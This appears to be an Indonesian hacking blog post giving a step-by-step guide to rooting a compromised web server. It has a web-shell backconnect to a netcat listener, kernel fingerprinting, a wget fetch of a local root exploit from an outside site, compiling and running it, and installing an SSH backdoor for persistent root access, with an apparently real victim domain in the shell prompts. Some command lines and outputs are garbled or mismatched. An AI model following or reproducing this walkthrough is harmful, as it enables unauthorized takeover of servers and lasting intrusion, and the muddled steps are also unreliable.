Sebuah Shell pada sebuah situs web
Exploit
Log cleaner
Ssh Backdoor
Netcat
Otak
Now let's kill the root:
Lakukan Backconnection ke server-
Salin direktori Netcat ke C: \
Buka command prompt, ketik: cd C:\netcat
Dan akan terlihat seperti ini:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\kislay> cd c:\netcat
c:\netcat>
ketik: nc-l-v-p 2.121
Ini akan terlihat seperti-
c:\netcat> nc -l -v -p 2121
listening on [any] 2121 ...Buka Shell di browser Anda, buka tab backconnection,
Tentukan ip & port Anda sebagai 2121. tekan connect, sekarang anda akan mendapatkan shell ke server,
anda dapat memberikan perintah ke server melalui shell itu.
Mendapatkan mengeksploitasi Tepat untuk server-
ketik: Uname-hit & enter.
akan terlihat seperti ini:
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux
Ini menunjukkan versi kernel dari server: 2.6.18-194.26.1.el5 & Tahun adalah 2010mmj
Anda perlu mencari eksploitasi yang sempurna untuk itu. Anda dapat mencari di-
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# R00tw0rm.com
# Compiling & executing exploit-
Sekarang aku punya mengeksploitasi, & itu ditulis dalam C. Jadi saya tidak bisa melaksanakannya dengan hanya meng-upload.
tapi aku harus compile.
Sebelum melangkah lebih jauh, Cd ke direktori tmp, selalu ditulis.
ketik seperti ini Cd/home/XXXXX/public_html/tmp
//Path dapat berbeda, ganti dengan milik anda.
Jadi pertama saya akan mendapatkan mengeksploitasi pada server,
dan saya
ketik: http://exploitsite.net/exploits/my_exploit.c Wget
akan terlihat Seperti ini-
[admin@www.targetsite.com /home/saijyoti/public_html/tmp]$ wget
http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]
sekarang ubah permission pada exploit ke 777.
ketik: Chmod 777 my_exploit.c
Ini mungkin terlihat seperti:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c
Sekarang mengeksploitasi adalah Pada server saya, saya hanya perlu untuk mengkompilasi & jalankan.
Jadi, aku akan memberikan perintah: gcc -o exploit exploit.c
Ini mungkin terlihat seperti ini:
[Admin@www.targetsite.com / home / targetsite / public_html / tmp] $ gcc -o exploit exploit.cLangkah selanjutnya adalah untuk melaksanakannya Jadi kita akan ketik: ./exploit
mungkin terlihat seperti ini:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o ImpelDown.c
dan anda mendapatkan root!!!!Sekarang mendapat root. Mari Periksa apakah benar,
Type: id
Ini mungkin terlihat seperti
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)Yang Berarti aku ROOT:)
# Instalasi Backdoor-
Jenis-Wget urlofbackdoor.com / sshdoor.zip
Kemudian Ketik,
Unzip Sshdoor.zip
ketik: ./run pass port
^ Ganti pass dengan password Anda, & port.
Now connect with putty & enjoy root privileges. ;)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
Metode untuk melaksanakan eksploitasi ditulis dalam bahasa lain-
#C exploitgcc
-o exploit exploit.c
chmod +x exploit
./exploit
#Perlperl
exploit.pl
#pythonpython
exploit.py
#phpphp
exploit.php
#zip
unzip exploit.zip
./run
0 komentar:
Posting Komentar